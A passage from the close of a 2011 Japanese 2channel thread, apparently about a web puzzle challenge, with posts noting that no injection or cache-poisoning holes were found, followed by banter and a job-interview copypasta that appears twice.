インジェクション関係も無い
getによる入力はどうかしらんが
少なくともpostの挙動を見る限りない
キャッシュ汚染系もない
そもそもgaeでその辺は管理してるので管轄外
と、ここまでもう結論づけていい?
反論あったらよろしこ
992 :名無しさん@お腹いっぱい。:2011/03/02(水) 08:43:39.76
993 : [―{}@{}@{}-] 名無しさん@お腹いっぱい。:2011/03/02(水) 08:59:16.11
あとリファラとかありそうだなーと思ったけど、何もなかったでござる。
994 :名無しさん@お腹いっぱい。:2011/03/02(水) 10:43:34.42
>>980
小学生が婚活パーティーに来てる気分でやってる
小学生が婚活パーティーに来てる気分でやってる
995 :名無しさん@お腹いっぱい。:2011/03/02(水) 11:34:49.90
喩えが下手すぎる
996 :名無しさん@お腹いっぱい。:2011/03/02(水) 15:23:09.52
大学は遊ぶ所である。俺は実感した。
普段の授業中はDQN色丸出しのテニサーやサッカー、野球サークルの奴らが
先輩や友人たちの情報を駆使して要領よく単位を取り
卒業後は優良企業に就職している現実を俺は受け止められない
俺は高校時代と同様に勉強さえ頑張っていれば良いのだと思っていた
とある企業へ面接に行ったときの話
同世代の上位5%に入る学歴とほとんどが優の成績の持ち主である俺なら
きっと内定がもらえるだろうとそう思っていた
「あなたが学生時代最も打ち込んだことを教えてください」
面接官に聞かれる。もちろん勉強に決まっている
「そう・・・ですか。ではあなたのアピールポイントは?」
それはこの学歴と大学時代に取得した様々な資格だ
「・・・それしかないんですか?他には?」
何だと?"それしか"とはどういうことだ。十分なアピールになるだろうが
そう言いたいのをこらえる。
とりあえず真面目さが売りだ。仕事は真面目にやる。
そう答えたが
「普通仕事は誰だって真面目にやりますよ。生活が掛かってるんだから」
そう言われた。いちいちうるさい面接官だ
「では大学時代の経験について聞かせてください」
だから勉強を頑張ったと言っているだろう。あ、あと本屋でのバイトもあるな、
三ヶ月でやめたけど
「そう・・・ですか。では中学、高校時代に何かスポーツはやっていましたか?」
は?勉強で忙しいのに部活、特に疲れる運動部なんかやるわけがないだろ。
勉強に差支えが出る。成績がよければ教師からほめられる。
勉強しないで部活に打ち込んでたような馬鹿とは大違いだ
「・・・分かりました。以上です。」
後日、その企業から激励の知らせを受けた
普段の授業中はDQN色丸出しのテニサーやサッカー、野球サークルの奴らが
先輩や友人たちの情報を駆使して要領よく単位を取り
卒業後は優良企業に就職している現実を俺は受け止められない
俺は高校時代と同様に勉強さえ頑張っていれば良いのだと思っていた
とある企業へ面接に行ったときの話
同世代の上位5%に入る学歴とほとんどが優の成績の持ち主である俺なら
きっと内定がもらえるだろうとそう思っていた
「あなたが学生時代最も打ち込んだことを教えてください」
面接官に聞かれる。もちろん勉強に決まっている
「そう・・・ですか。ではあなたのアピールポイントは?」
それはこの学歴と大学時代に取得した様々な資格だ
「・・・それしかないんですか?他には?」
何だと?"それしか"とはどういうことだ。十分なアピールになるだろうが
そう言いたいのをこらえる。
とりあえず真面目さが売りだ。仕事は真面目にやる。
そう答えたが
「普通仕事は誰だって真面目にやりますよ。生活が掛かってるんだから」
そう言われた。いちいちうるさい面接官だ
「では大学時代の経験について聞かせてください」
だから勉強を頑張ったと言っているだろう。あ、あと本屋でのバイトもあるな、
三ヶ月でやめたけど
「そう・・・ですか。では中学、高校時代に何かスポーツはやっていましたか?」
は?勉強で忙しいのに部活、特に疲れる運動部なんかやるわけがないだろ。
勉強に差支えが出る。成績がよければ教師からほめられる。
勉強しないで部活に打ち込んでたような馬鹿とは大違いだ
「・・・分かりました。以上です。」
後日、その企業から激励の知らせを受けた
997 :名無しさん@お腹いっぱい。:2011/03/02(水) 15:35:50.77
998 :名無しさん@お腹いっぱい。:2011/03/02(水) 15:56:58.09
難しいね
999 :名無しさん@お腹いっぱい。:2011/03/02(水) 15:57:41.47
1000 :名無しさん@お腹いっぱい。:2011/03/02(水) 16:35:55.45
>>1000ならみんなLv5クリア
1001 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。